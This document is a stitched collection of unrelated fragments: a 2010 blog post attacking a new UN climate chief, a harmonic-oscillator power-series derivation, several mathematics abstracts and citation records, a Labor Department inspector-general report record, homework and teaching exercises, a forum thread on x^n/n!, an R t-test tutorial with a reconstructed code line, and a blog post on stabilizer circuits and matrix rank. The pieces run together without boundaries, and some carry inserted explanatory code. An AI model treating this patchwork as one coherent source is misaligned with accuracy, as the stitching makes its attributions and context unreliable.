## Tuesday, May 18, 2010

### Christiana Figueres: new U.N. climate boss

Yvo de Boer has resigned as the UNFCCC chief. Christiana Figueres of Costa Rica has been chosen as his successor. To be sure that the same pseudointellectual junk and political propaganda will continue to contaminate this portion of the international political scene, check her "campaign". This transition politically means that the third world could become more influential in these irrational negotiations. That could be bad - but it's very logical. After all, Costa Rica is way ahead of the Netherlands (where Yvo de Boer lives) when it comes to CO2 emissions: the Dutch GDP per capita is $40,000 (PPP) and $48,000 (nominal) while Costa Rica's GDP per capita is just $11,000 (PPP) and $6,400 (nominal), so Costa Rica is approximately five times "better" than the Netherlands. The CO2 emissions per capita are nearly proportional to the GDP per capita - but no one cares about this particular number, anyway. Costa Rica emits something like 2 tons of CO2 per capita per year while the Netherlands emits 23 tons or so. If you reduce your emissions to 1/10, your wealth will drop to 1/5 or so, which is about the 0.7th power of 1/10.
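Spelled out, the arithmetic behind that last sentence is just $(1/10)^{0.7} = 10^{-0.7} \approx 0.2 = 1/5$: cutting emissions to one tenth corresponds to roughly one fifth of the wealth if wealth scales as emissions to the 0.7th power.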
To solve this second-order, linear, homogeneous differential equation, the unknown function $x(t)$ is written as a power series: $\begin{eqnarray} x(t) &=& \sum_{n=0}^{\infty} a_n t^n \\ \Big( x(t) &=& a_0 + a_1 t + a_2 t^2 + a_3 t^3 + ... \Big) \end{eqnarray}$ The first and second time derivatives of the function $x(t)$ are then: $\begin{eqnarray} \dot{x}(t) &=& \sum_{n=1}^{\infty} n a_n t^{n-1} \\ \Big( \dot{x}(t) &=& a_1 + 2a_2 t + 3a_3 t^2 + ... \Big) \\ \ddot{x}(t) &=& \sum_{n=2}^{\infty} n(n-1)a_n t^{n-2} \\ \Big( \ddot{x}(t) &=& 2a_2 + 6a_3 t + ... \Big) \end{eqnarray}$ Using these expressions for $x(t)$ and $\ddot{x}(t)$ in the equation of motion, we get: $\sum_{n=2}^{\infty} n(n-1)a_n t^{n-2} + \omega_0^2 \sum_{n=0}^{\infty} a_n t^n = 0$ The next step is to shift the index of the first sum so that everything is gathered under a single sum ($\sum$): $\sum_{n=0}^{\infty} \Big[ (n+2)(n+1)a_{n+2} + \omega_0^2 a_n \Big] t^n = 0$ Each coefficient must be equal to $0$ for the power series to vanish identically, so that: $(n+2)(n+1)a_{n+2} + \omega_0^2 a_n = 0 \quad \forall n \in \mathbb{N} \quad (n = 0,1,2,3,...)$ i.e.: $a_{n+2} = - \frac{a_n \omega_0^2}{(n+2)(n+1)} \quad \forall n \in \mathbb{N} \quad (n = 0,1,2,3,...)$ This recurrence relation, together with the initial conditions (chosen as the conditions at time $t=0$) given below, allows us to solve the equation of motion by finding the value of each coefficient $a_n$: $\begin{eqnarray} a_0 &=& x(0) \qquad \textrm{this is the position at the origin of time}\\ a_1 &=& \dot{x}(0) \qquad \textrm{this is the speed at the origin of time} \\ a_2 &=& - \frac{\omega_0^2}{2 \times 1} a_0 \\ a_3 &=& - \frac{\omega_0^2}{3 \times 2} a_1 \\ a_4 &=& - \frac{\omega_0^2}{4 \times 3} a_2 = \frac{\omega_0^4}{4!} a_0 \\ a_5 &=& - \frac{\omega_0^2}{5 \times 4} a_3 = \frac{\omega_0^4}{5!} a_1 \\ \end{eqnarray}$ and so on. Finally, $x(t)$ is found to be equal to: $\begin{eqnarray} x(t) &=& \sum_{n=0}^{\infty} a_n t^n \\ x(t) &=& a_0 + a_1 t + a_2 t^2 + a_3 t^3 + a_4 t^4 + a_5 t^5 + ... \\ x(t) &=& a_0 + a_1 t - \frac{\omega_0^2}{2!} a_0 t^2 - \frac{\omega_0^2}{3!} a_1 t^3 + \frac{\omega_0^4}{4!} a_0 t^4 + \frac{\omega_0^4}{5!} a_1 t^5 + ... \end{eqnarray}$ Grouping the $a_0$ and $a_1$ terms, we get: $\begin{eqnarray} x(t) &=& a_0 \Big[ 1 - \frac{\omega_0^2 t^2}{2!} + \frac{\omega_0^4 t^4}{4!} - ... \Big] + a_1 \Big[ t - \frac{\omega_0^2 t^3}{3!} + \frac{\omega_0^4 t^5}{5!} - ... \Big] \\ x(t) &=& a_0 \Big[ 1 - \frac{(\omega_0 t)^2}{2!} + \frac{(\omega_0 t)^4}{4!} - ... \Big] + \frac{a_1}{\omega_0} \Big[ \omega_0 t - \frac{(\omega_0 t)^3}{3!} + \frac{(\omega_0 t)^5}{5!} - ... \Big] \\ x(t) &=& a_0 \cos (\omega_0 t) + \frac{a_1}{\omega_0} \sin (\omega_0 t) \end{eqnarray}$ since the expressions between brackets correspond to the series definitions of the cosine and sine functions. The solution of the equation of motion is thus: $x(t) = A\cos (\omega_0 t) + B \sin (\omega_0 t)$ where $A$ and $B$ are real quantities determined by the initial conditions. The solution can also be written as: $x(t) = M\cos(\omega_0 t - \alpha)$ with $\begin{eqnarray} M &=& \sqrt{A^2+B^2} \\ \tan \alpha &=& \frac{B}{A} \\ A &=& M \cos \alpha \\ B &=& M \sin \alpha \end{eqnarray}$ In complex form: $x(t) = Ce^{i\omega_0 t} + De^{-i\omega_0 t}$ where $\begin{eqnarray} C &=& A/2 + B/(2i) \\ D &=& A/2 - B/(2i) \end{eqnarray}$
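As a quick numerical check of this derivation (an illustrative sketch, not part of the original text), the following Python snippet builds the coefficients $a_n$ from the recurrence above, with arbitrarily chosen values for $\omega_0$, $x(0)$ and $\dot{x}(0)$, and compares the truncated series against $a_0\cos(\omega_0 t) + (a_1/\omega_0)\sin(\omega_0 t)$.

```python
import numpy as np

# Hypothetical parameters (not from the text): angular frequency and initial conditions.
omega0, x0, v0 = 2.0, 1.0, 0.5
N = 40  # number of power-series terms kept

# Coefficients a_n from the recurrence a_{n+2} = -omega0^2 * a_n / ((n+2)(n+1)).
a = np.zeros(N)
a[0], a[1] = x0, v0
for n in range(N - 2):
    a[n + 2] = -omega0**2 * a[n] / ((n + 2) * (n + 1))

t = np.linspace(0.0, 3.0, 7)
series = sum(a[n] * t**n for n in range(N))
closed_form = x0 * np.cos(omega0 * t) + (v0 / omega0) * np.sin(omega0 * t)

print(np.max(np.abs(series - closed_form)))  # tiny, e.g. around 1e-12 or smaller
```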
Mat. Zametki, 2006, Volume 80, Issue 4, Pages 483–489 (Mi mz2840)

Properties of the metric projection on weakly vial-convex sets and parametrization of set-valued mappings with weakly convex images

M. V. Balashov, G. E. Ivanov
Moscow Institute of Physics and Technology

Abstract: We continue studying the class of weakly convex sets (in the sense of Vial). For points in a sufficiently small neighborhood of a closed weakly convex subset in Hilbert space, we prove that the metric projection on this set exists and is unique. In other words, we show that the closed weakly convex sets have a Chebyshev layer. We prove that the metric projection of a point on a weakly convex set satisfies the Lipschitz condition with respect to a point and the Hölder condition with exponent $1/2$ with respect to a set. We develop a method for constructing a continuous parametrization of a set-valued mapping with weakly convex images. We obtain an explicit estimate for the modulus of continuity of the parametrizing function.

DOI: https://doi.org/10.4213/mzm2840
Full text: PDF file (411 kB)
English version: Mathematical Notes, 2006, 80:4, 461–467
UDC: 517.982.252

Citation: M. V. Balashov, G. E. Ivanov, “Properties of the metric projection on weakly vial-convex sets and parametrization of set-valued mappings with weakly convex images”, Mat. Zametki, 80:4 (2006), 483–489; Math. Notes, 80:4 (2006), 461–467

Citation in format AMSBIB:
\Bibitem{BalIva06}
\by M.~V.~Balashov, G.~E.~Ivanov
\paper Properties of the metric projection on weakly vial-convex sets and parametrization of set-valued mappings with weakly convex images
\jour Mat. Zametki
\yr 2006
\vol 80
\issue 4
\pages 483--489
\mathnet{http://mi.mathnet.ru/mz2840}
\crossref{https://doi.org/10.4213/mzm2840}
\mathscinet{http://www.ams.org/mathscinet-getitem?mr=2314356}
\zmath{https://zbmath.org/?q=an:1117.52001}
\elib{http://elibrary.ru/item.asp?id=9293153}
\transl
\jour Math. Notes
\yr 2006
\vol 80
\issue 4
\pages 461--467
\crossref{https://doi.org/10.1007/s11006-006-0163-y}
\isi{http://gateway.isiknowledge.com/gateway/Gateway.cgi?GWVersion=2&SrcApp=PARTNER_APP&SrcAuth=LinksAMR&DestLinkType=FullRecord&DestApp=ALL_WOS&KeyUT=000241868700022}
\scopus{http://www.scopus.com/record/display.url?origin=inward&eid=2-s2.0-33750337465}

Linking options:
• http://mi.mathnet.ru/eng/mz2840
• https://doi.org/10.4213/mzm2840
• http://mi.mathnet.ru/eng/mz/v80/i4/p483

This publication is cited in the following articles:
1. G. E. Ivanov, M. V. Balashov, “Lipschitz continuous parametrizations of set-valued maps with weakly convex images”, Izv. Math., 71:6 (2007), 1123–1143
2. G. E. Ivanov, “Continuous selections of multifunctions with weakly convex values”, Topology Appl., 155:8 (2008), 851–857
3. V. V. Goncharov, F. F. Pereira, “Neighbourhood retractions of nonconvex sets in a Hilbert space via sublinear functionals”, J. Convex Anal., 18:1 (2011), 1–36
4. V. V. Goncharov, F. F. Pereira, “Geometric conditions for regularity in a time-minimum problem with constant dynamics”, J. Convex Anal., 19:3 (2012), 631–669
5. V. V. Goncharov, G. E. Ivanov, “Strong and weak convexity of closed sets in a Hilbert space”, in: Operations Research, Engineering, and Cyber Security: Trends in Applied Mathematics and Technology (Springer Optimization and Its Applications, 113), eds. N. Daras, T. Rassias, Springer International Publishing, 2017, 259–297
6. M. V. Balashov, “About the gradient projection algorithm for a strongly convex function and a proximally smooth set”, J. Convex Anal., 24:2 (2017), 493–500
7. M. S. Lopushanski, “Normal regularity of weakly convex sets in asymmetric normed spaces”, J. Convex Anal., 25:3 (2018), 737–758
8. M. V. Balashov, “Uslovie Lipshitsa metricheskoi proektsii v gilbertovom prostranstve” [The Lipschitz condition for the metric projection in a Hilbert space], Fundament. i prikl. matem., 22:1 (2018), 13–29
9. M. V. Balashov, “The Pliś metric and Lipschitz stability of minimization problems”, Sb. Math., 210:7 (2019), 911–927
dc.contributor.author: Office of the Inspector General
dc.date.accessioned: 2020-11-25T15:14:41Z
dc.date.available: 2020-11-25T15:14:41Z
dc.date.issued: 1989-01-01
dc.identifier.other: 11659082
dc.identifier.uri: https://hdl.handle.net/1813/77917
dc.description.abstract: [Excerpt] This is the twenty-first Semiannual Report of the U.S. Department of Labor's Office of Inspector General (OIG). I am issuing it in accordance with the provisions of the Inspector General Act of 1978 (P.L. 95-452). The Congress made clear its intent in this Act that the Inspector General should be a leading force in detecting, investigating and preventing fraud, waste, and abuse in or affecting the programs administered by this Department. I look back with considerable satisfaction on the accomplishments of the OIG during the 6-year period since I was nominated by President Reagan to be the Inspector General. I am pleased to be associated with many well-motivated employees of the Department of Labor who have contributed to these efforts, but I am especially indebted to the highly dedicated professionals and support staff of the OIG who have worked so tirelessly with what has too often been too little public appreciation of their work. They have worked to improve the management and operations of the Department of Labor, thereby saving or recovering vast sums of Federal funds and helping to convict numerous individuals for serious violations of Federal criminal laws. During this 6-year period, OIG auditors questioned the expenditure of over $1 billion. More than half of this was determined by the Department to have been improperly expended, and recovery was sought. Over this same 6-year period, nearly 4,700 criminal indictments and 3,600 convictions resulted from our investigative work. These investigations also produced over $100 million in fines, penalties, restitutions, settlements, recoveries, and cost efficiencies. Over this 6-year period, a good portion of this success is attributable to the history of support and cooperation that my Office has received from the Department's management and employees. Recently, however, I fear that the OIG has been experiencing something of a significant shift that may not bode well for future cooperation in audits and investigations. Where speedy cooperation was once encouraged by top-level Department of Labor management, our requests for information or assistance are now too often subjected to a protracted delay. Today, questions about OIG authority, requests for clarifications, requests for opinions or rulings from the Solicitor or DOJ, or other such actions are routinely used to frustrate any audit or investigative activity that does not fit the current, narrow view of OIG authority that has been held by certain departmental officials. Furthermore, I am concerned about the effectiveness of the Department's enforcement of the laws designed to protect pension and benefit plans, but am heartened by the Secretary's recent statement, "Developing a sound, comprehensive pension and retirement policy is among the Department's most important responsibilities and one of my top priorities." The Department has been entrusted with a responsibility and it must keep that trust. To paraphrase President Bush, when the Government says something, it must mean it. It must keep its word, its promise, its vow to the American people. This means enforcing the criminal as well as the civil provisions of those laws entrusted to it by the Congress and the American people. I am hopeful that the placement of appointees in the new Administration will lead us back to a positive environment in which we all shall strive to meet the difficult challenges confronting the American worker. To be successful in this endeavor, Secretary Dole must have the benefit of the talents and energies of all of the Department's organizations and employees. I trust that this report will, in addition, help the Secretary assure that a well-balanced and effective enforcement program is one of the first steps taken to create a comprehensive pension policy. The OIG will continue to monitor and report on actions taken by DOL management to address and resolve these serious problems.
dc.language.iso: en_US
dc.subject: Office of the Inspector General
dc.subject: Department of Labor
dc.subject: audit
dc.subject: employee integrity
dc.subject: fraud
dc.subject: Congress
dc.title: Semi-Annual Report to Congress for the Period of October 1, 1988 - March 31, 1989
dc.type: unassigned
dc.description.legacydownloads: OIG_Semiannual_Report_to_Congress_v21.pdf: 34 downloads, before Oct. 1, 2020.
local.authorAffiliation: Office of the Inspector General: True
Roll n fair dice, and let Xn be the maximum number that is rolled. (a) [12pts] Compute E[Xn] as a function of n. (b) [4pts] What is lim(n-> inf) E[Xn]?
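Not part of the problem statement, but a quick way to sanity-check an answer: the Python sketch below computes E[Xn] exactly from the tail-sum identity E[Xn] = sum_{k=1}^{6} P(Xn >= k) = 6 - sum_{j=1}^{5} (j/6)^n and compares it against a Monte Carlo estimate.

```python
import random

def exact_e_max(n, sides=6):
    # E[X_n] = sum_{k=1}^{sides} P(X_n >= k) = sides - sum_{j=1}^{sides-1} (j/sides)**n
    return sides - sum((j / sides) ** n for j in range(1, sides))

def simulated_e_max(n, trials=100_000, sides=6):
    total = 0
    for _ in range(trials):
        total += max(random.randint(1, sides) for _ in range(n))
    return total / trials

for n in (1, 2, 5, 20):
    print(n, round(exact_e_max(n), 4), round(simulated_e_max(n), 3))
# As n grows, the maximum is almost surely 6, so E[X_n] -> 6, which answers part (b).
```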
13 Jul 2015

# Objective

This was our exercise on the first day covering hypothesis testing for two independent populations. I wanted students to come up on their own with the form of a two-population hypothesis test, and with a basic idea of the test statistic. Everyone nailed $H_0: \mu_S = \mu_T$. Wording of the second and third questions was intentionally vague to make the students think. It was partially successful - several groups originally wrote that under the null hypothesis, the stiffness of the samples is the same, even though the data contradicts that statement. After some leading questions they all got to the statement that the difference in sample means should tend to be small under the null. Some groups rushed through and tried to calculate t-statistics for the third question, which was specifically against my wishes (and they didn’t yet know what they were doing). However, a couple of groups did well and suggested either a t-test somehow based on ${\bar S} - {\bar T}$ (which was exactly what I wanted to hear), or a permutation test (which was beyond what I hoped they would come up with).

# Exercise

## Setup

We have talked several times about using data to test whether the expectation of a population is equal to some value. We tended to write the null hypothesis like this: $H_0: \mu = \mu_0$. Now, imagine that you work at a bicycle factory where you’d like to replace steel tubes in the company’s bicycle frames with titanium (because it’s lighter). You have carefully selected random samples of the steel and titanium tubes from your suppliers. You measure the stiffness of each tube in a testing rig. The data are (measured in pounds per square inch, psi):

## Question

• In order for the bicycles to perform the same after the switch, you would like to have tubes with identical stiffness. How might you write down the null hypothesis that the expected stiffness is the same between the two groups?
• If the null hypothesis is true, then what can we say about the samples of steel and titanium tubes?
• Can you construct a test statistic that would be useful for testing these hypotheses? Brainstorm as many ideas as you can, but don’t bother with calculations.
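The original data table isn't reproduced above, but here is a small Python sketch of the kind of two-sample calculation the exercise is driving at, using made-up stiffness numbers purely for illustration (scipy's `ttest_ind` computes a t-statistic built on the difference in sample means).

```python
import numpy as np
from scipy import stats

# Hypothetical stiffness measurements in psi; the post's actual data table is
# not reproduced here, so these numbers are invented purely for illustration.
steel    = np.array([10240.0, 10100.0, 10380.0, 10210.0, 10290.0, 10150.0])
titanium = np.array([10080.0, 10260.0, 10030.0, 10190.0, 10110.0, 10070.0])

# Two-sample (Welch) t-test of H0: mu_S = mu_T, based on S_bar - T_bar.
t_stat, p_value = stats.ttest_ind(steel, titanium, equal_var=False)
print(f"mean difference = {steel.mean() - titanium.mean():.1f} psi")
print(f"t = {t_stat:.3f}, p = {p_value:.3f}")
```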
On the Zeros of the Riemann Zeta Function in the Critical Strip

Richard P. Brent
Mathematics of Computation, Vol. 33, No. 148 (Oct., 1979), pp. 1361-1372
DOI: 10.2307/2006473
Stable URL: http://www.jstor.org/stable/2006473
Page Count: 12

Abstract

We describe a computation which shows that the Riemann zeta function $\zeta(s)$ has exactly 75,000,000 zeros of the form $\sigma + it$ in the region $0 < t < 32,585,736.4$; all these zeros are simple and lie on the line $\sigma = \frac{1}{2}$. (A similar result for the first 3,500,000 zeros was established by Rosser, Yohe and Schoenfeld.) Counts of the number of Gram blocks of various types and the number of failures of "Rosser's rule" are given.
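Unrelated to Brent's large-scale computation, but as a small illustration of what "zeros on the line $\sigma = \frac{1}{2}$" means, the mpmath library can locate the first few nontrivial zeros numerically (a sketch; `zetazero(n)` returns the n-th zero in the upper half-plane).

```python
from mpmath import mp, zetazero, zeta

mp.dps = 20  # working precision in decimal digits

for n in range(1, 4):
    rho = zetazero(n)              # n-th nontrivial zero, e.g. 0.5 + 14.1347...j
    print(n, rho, abs(zeta(rho)))  # |zeta(rho)| should be ~0 up to the precision used
```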
# Easy Sequence

1. Sep 28, 2007

### Howers

x^n/n! -> 0 as n -> +oo

I got 2 texts that explain this in 2 lines. A lot of steps skipped as you can imagine. Can anyone prove this in toddler language?

2. Sep 29, 2007

### robert Ihnot

I see you mean: (x^n)/n!. Let's suppose $j$ is the next largest integer to $x$, and consider the larger value $(j^n)/n!$. When $n=j$ we have $(j^j)/j!$, where only the last factor is $j/j=1$. Now extend the product from $n=j$ to $n=2j$: this multiplies $(j^j)/j!$ by $$\prod_{i=1+j}^{2j}\frac{j}{i},$$ in which every term is less than 1. We can continue to increase $n$ to $3j$, producing another factor $$\prod_{i=2j+1}^{3j}\frac{j}{i},$$ which is even smaller, etc. Multiplying these products all together as $n$ becomes boundless gives us our result.

Last edited: Sep 29, 2007

3. Sep 29, 2007

### Gib Z

Or we could just note that n! grows much faster than x^n for any finite x. We can see this by looking at subsequent terms of the sequence. If x is some finite number, as soon as you get past the x-th term, the denominator is multiplying by numbers larger than x, whilst the numerator is still multiplying by x.
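A quick numerical illustration of this point (my own sketch, with an arbitrarily chosen x): once n passes x, each successive term equals the previous one times x/(n+1) < 1, so the terms collapse toward 0.

```python
import math

x = 7.5  # an arbitrary fixed value of x
for n in (5, 10, 20, 40, 80):
    print(f"n = {n:2d}   x**n / n! = {x**n / math.factorial(n):.3e}")
# Once n exceeds x, each step multiplies the previous term by x/(n+1) < 1,
# so the terms shrink toward 0 faster and faster.
```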
MathSciNet bibliographic data

MR1687331 (2000j:68062) 68Q17
Håstad, Johan. Clique is hard to approximate within $n^{1-\epsilon}$. Acta Math. 182 (1999), no. 1, 105–142.

For users without a MathSciNet license, Relay Station allows linking from MR numbers in online mathematical literature directly to electronic journals and original articles. Subscribers receive the added value of full MathSciNet reviews.
# How to return a logical value for a t test based on 0.05 level of significance in R?

To return a logical value for a t test based on the 0.05 level of significance in R, we can follow the steps below −

• First of all, create a data frame with one column.
• Apply the t.test function with ifelse to return a logical value based on the 0.05 level of significance.

## Example 1

Create the data frame

Let's create a data frame as shown below −

x<-rnorm(20)
df1<-data.frame(x)
df1

On executing, the above script generates the below output (this output will vary on your system due to randomization) −

            x
1   0.44038858
2   1.08938356
3  -0.23627885
4   0.73953751
5  -0.55476732
6   0.97726848
7   0.25612436
8  -1.89827676
9   0.50333232
10  0.55482166
11  1.83279952
12  0.93609228
13  0.35048901
14  0.05136088
15 -0.89102106
16  1.06392349
17 -0.15777431
18  0.45506977
19  1.43752763
20  1.27393923

## Apply t.test to get the logical return

Using t.test with ifelse to return a logical output based on significance level 0.05 for the "less than" alternative −

x<-rnorm(20)
df1<-data.frame(x)
# One way to get a Yes/No answer (reconstructed; the test line itself was
# missing from the excerpt): compare the one-sided p-value against 0.05.
ifelse(t.test(df1$x,alternative="less")$p.value<0.05,"Yes","No")

### Output

[1] "No"
A new paper with Chaowen Guan Chaowen Guan is a PhD student at Buffalo. After a busy end to the Spring 2019 term at UB, we are getting time to write about our paper, “Stabilizer Circuits, Quadratic Forms, and Computing Matrix Rank.” Today we emphasize new connections we have found between simulating special quantum circuits and computing matrix rank over the field ${\mathbb{F}_2}$. The quantum circuits involved have been known as polynomial-time solvable since 1998. They are not universal but form important building blocks of quantum systems people intend to build. They impact the problem of showing quantum circuits are more powerful than classical circuits—the quantum advantage problem—in terms of how much harder quantum stuff must be added to them. The question is: How efficiently can we simulate these special circuits? Our answer improves the bound from order-${n^3}$ to ${n^{\omega}}$, where ${\omega}$ here means the current best-known exponent for multiplying ${n \times n}$ matrices (over ${\mathbb{F}_2}$ or any field). Today ${\omega}$ stands at ${2.3728\dots}$. The non-quantum problem of counting solutions to a quadratic polynomial ${f(x_1,\dots,x_n)}$ modulo 2 is likewise improved from the ${O(n^3)}$ shown by Andrzej Ehrenfeucht and Marek Karpinski to ${O(n^\omega)}$. This comes at a price, however, because the matrix multiplication algorithms that optimize the exponent are galactic. In this post we’ll emphasize what is not galactic: reductions to and from the problem of computing matrix rank that run in linear time—meaning ${O(n^2)}$ time for dense matrices—except for the need to check a yes/no condition in one of them. All this builds on the algebraic methods in our paper last year with Amlan Chakrabarti of the University of Calcutta. Chaowen has contributed a post and some other materials for this blog. His work first came up in a post three years ago that saluted Dick and Kathryn’s wedding. Today is their third anniversary—so this post also comes with happy anniversary wishes. ## Strong Simulation Problems We have covered quantum algorithms several times. We discussed stabilizer circuits in an early post on the work with Amlan and covered them more recently in connection with the work of Jin-Yi Cai’s group. Suffice it to say that stabilizer circuits—which extend Clifford circuits by allowing intermediate measurement gates—form the most salient case that classical computers can simulate in polynomial time. The simulation time is sometimes cited as ${O(n^2)}$ going back to a 2004 paper by Scott Aaronson and Daniel Gottesman, but there is a catch: this is only for one measurement of one qubit. For general (non-sparse) instances, all of various other algorithms need order-${n^2}$ time to re-organize their data structures after each single-qubit measurement. This is so even if one merely wants to measure all ${n}$ qubits in one shot: the time becomes ${O(n^3)}$. This is one case of what is generally called a strong simulation. It is precisely this time that Chaowen and I improved to ${O(n^\omega)}$. In wider contexts, strong simulation of a quantum circuit ${C}$ means the ability to compute the probability of a given output to high precision. When the input and output are both in ${\{0,1\}^n}$ we may suppose both are ${0^n}$ since we can prepend and append ${\mathsf{NOT}}$ gates to ${C}$. Then strong simulation means computing the amplitude ${\langle 0^n |C| 0^n \rangle}$ (or computing ${|\langle 0^n |C| 0^n \rangle|^2}$ which is the output probability) to ${n}$-place precision. 
It doesn’t take much for this to be ${\mathsf{NP}}$-hard, often ${\mathsf{\#P}}$-complete. If we take the Clifford generating set $\displaystyle \mathsf{H} = \frac{1}{\sqrt{2}}\begin{bmatrix} 1 & 1 \\ 1 & -1 \end{bmatrix},\quad \mathsf{CZ} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & -1 \end{bmatrix},\quad \mathsf{S} = \begin{bmatrix} 1 & 0 \\ 0 & i \end{bmatrix},$ then we can get universal circuits by adding any one of the following gates: $\displaystyle \mathsf{T} = \begin{bmatrix} 1 & 0 \\ 0 & \sqrt{i} \end{bmatrix},\quad \mathsf{CS} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & i \end{bmatrix},\quad \mathsf{Tof} = \mathit{diag}(1,1,1,1,1,1,\begin{bmatrix} 0 & 1 \\ 1 & 0 \end{bmatrix}).$ In the last one we’ve portrayed the ${8 \times 8}$ matrix of the Toffoli gate as being block-diagonal. We will later consider block-diagonal matrices permuted so that all ${2 \times 2}$ “blocks” are at upper left. There is much recent literature on trying to simulate circuits with limited numbers of non-Clifford gates, and on how many such gates may be needed for exponential lower bounds—even just to tell whether ${\langle 0^n |C| 0^n \rangle \neq 0}$. This plays against a wider context of efforts toward quantum advantage. Chaowen and I have been trying to apply algebraic-geometric techniques for new lower bounds at the high end, but this time we found new upper bounds at the low end. ## From Matrix Rank to Quantum It is not known how to compute the rank ${rk(A)}$ of a dense matrix ${A}$ in better than matrix-multiplication time, even over ${\mathbb{F}_2}$. We may suppose ${A}$ is square and symmetric, since we can always form the block matrix $\displaystyle A' = \begin{bmatrix} 0 & A^\top \\ A & 0 \end{bmatrix}$ and then ${rk(A) = \frac{1}{2}rk(A')}$. In the case of ${\mathbb{F}_2}$, ${A'}$ is the adjacency matrix ${A_G}$ of an undirected bipartite graph ${G}$. The rank of ${A_G}$ for any undirected graph ${G = (V,E)}$ must be even. Whereas the rank of the ${|V| \times |E|}$ vertex-edge incidence matrix always equals ${n}$ minus the number of connected components of ${G}$, less is known about characterizing ${rk(A_G)}$. Our first main theorem brings quantum strong simulation into the picture. Let ${N}$ stand for ${n^2}$. Theorem 1 Given any ${A \in \mathbb{F}_2^{n \times n}}$ we can construct in ${O(N)}$ time a stabilizer circuit ${C}$ on ${2n}$ qubits such that $\displaystyle rk(A) = \log_2(|\langle 0^{2n} |C| 0^{2n} \rangle|).$ One interpretation is that if you believe matrix rank is a “mildly hard” function (with regard to ${O(N)}$-time computability) then predicting the result of measuring all the qubits in a stabilizer circuit is also “mildly hard.” Such mild hardness would represent a gap between the ${O(n^2)}$ time for weak simulation and the time for strong simulation. Such gaps have been noted and proved for extensions of stabilizer circuits but those are between “polynomial” and an intractable hardness notion. One can also view Theorem 1 as a possible avenue toward computing matrix rank without doing either matrix multiplication or Gaussian elimination. This is the view Chaowen and I have had all along. ## From Quantum to Rank The distinguishing point of our converse reduction to the rank ${r}$ is knowledge of normal forms that depend on ${r}$ where one can use the knowledge to delay or avoid computing them explicitly. 
The normal forms are for polynomials ${f_C}$ associated to quantum circuits ${C}$ in our earlier work. Stabilizer circuits yield ${f_C}$ as a classical quadratic form over ${\mathbb{Z}_4}$, the integers modulo ${4}$. That is, all cross terms ${x_i x_j}$ in ${f_C}$ have even coefficients—here, ${0}$ or ${2}$. Thus quantum computing enters a debate that occupied Carl Gauss and others over two hundred years ago: Should every homogeneous quadratic polynomial ${f(x_1,\dots,x_n)}$ with integer coefficients be called a quadratic form, or only those whose cross terms ${c_{i,j}x_i x_j}$ all have even coefficients ${c_{i,j}}$? The point of even coefficients is that they enable having a symmetric ${n \times n}$ integer matrix ${S}$ such that $\displaystyle f(x) = x^\top S x$ for all ${x}$. Without that condition, ${S}$ might only be half-integral. This old difference turns out to mirror that between universal quantum computing and classical, because the non-Clifford ${\mathsf{CS}}$-gate noted above yields circuits ${C}$ whose ${f_C}$ over ${\mathbb{Z}_4}$ have terms ${x_i x_j}$ and/or ${3 x_i x_j}$. While counting solutions in ${\mathbb{Z}_4^n}$ for those polynomials is in ${\mathsf{P}}$, counting their binary solutions is ${\mathsf{\#P}}$-complete—an amazing dichotomy we expounded here. We hasten to add that for ${k = 2}$ the classical forms coincide with those over ${\mathbb{Z}_{2^k}}$ whose nonzero cross terms all have coefficient ${2^{k-1}}$. Those are called affine in the work by Jin-Yi and others noted above, and our above-mentioned post noted his 2017 paper with Heng Guo and Tyson Williams giving another proof of polynomial-time simulation of stabilizer circuits via ${f_C}$ being affine. Our work improving the polynomial bounds, however, draws on a 2009 paper by Kai-Uwe Schmidt and further theory of classical quadratic forms. This paper uses work going back to 1938 that decomposes a classical (affine) quadratic form ${f}$ over ${\mathsf{Z}_4}$ further as $\displaystyle f(x) = f_0(x) + 2(x \bullet v) \quad\text{with}\quad f_0(x) = x^\top B x, \ \ \ \ \ (1)$ for binary arguments ${x}$. Here ${v}$ is a binary vector with ${v_i = 1}$ if ${S[i,i] = 2}$ or ${S[i,i] = 3}$, ${v_i =0}$ otherwise, and the operations including the inner product ${\bullet}$ are mod-2 except that the final ${+}$ is in ${\mathbb{Z}_4}$. Then ${f}$ is alternating if the diagonal of ${B}$ is all-zero, non-alternating otherwise. Now take ${r}$ to be the rank of ${B}$. The key normal-form lemma is: Lemma 2 There is a change of basis to ${y_1,\dots,y_n}$ such that if ${f}$ is non-alternating then ${f_0}$ is transformed to $\displaystyle f'_0(y) = y_1 + y_2 + \cdots + y_r,$ whereas if ${f}$ is alternating then ${r}$ is even and ${f_0}$ is transformed to $\displaystyle f'_0(y) = 2y_1 y_2 + 2y_3 y_4 + \cdots + 2y_{r-1} y_r.$ In either case, there is a binary vector ${w}$ so that ${f(y) = f'_0(y) + 2(y \bullet w)}$ for all ${y}$. The point is that to evaluate the quantum circuit ${C}$, we don’t need to evaluate ${f_C}$, but can make inferences about the structure of the solution sets to ${f_C(x) = a}$ for ${a = 0,1,2,3 \pmod{4}}$, where ${x \in \{0,1\}^n}$. Given the knowledge of ${r}$, the normal form goes a long way to this. The vector ${w}$ is also needed, but the fact of its having only ${n}$ bits gives hope of finding it in ${O(n^2) = O(N)}$ time. That—plus an analysis of the normal form ${f'_0,w}$ itself of course—would complete an ${O(N)}$-time reduction from computing the amplitude to computing ${r}$. 
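As a concrete point of reference (an illustrative sketch, not code from the paper), here is the straightforward way to compute the rank ${r}$ of a 0-1 matrix over ${\mathbb{F}_2}$ by Gaussian elimination: the ${O(n^3)}$ baseline that the fast decompositions discussed next are meant to beat.

```python
import numpy as np

def rank_gf2(A):
    """Rank of a 0/1 matrix over F_2 via plain Gaussian elimination (O(n^3))."""
    M = np.array(A, dtype=np.uint8) % 2
    rows, cols = M.shape
    r = 0
    for c in range(cols):
        pivot = next((i for i in range(r, rows) if M[i, c]), None)
        if pivot is None:
            continue
        M[[r, pivot]] = M[[pivot, r]]   # swap the pivot row into place
        for i in range(rows):
            if i != r and M[i, c]:
                M[i] ^= M[r]            # eliminate this column entry mod 2
        r += 1
    return r

# Example: the matrix B from the worked example below (path graph on 3 vertices).
B = [[0, 1, 0],
     [1, 0, 1],
     [0, 1, 0]]
print(rank_gf2(B))  # 2: an even rank, as expected for an adjacency matrix over F_2
```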
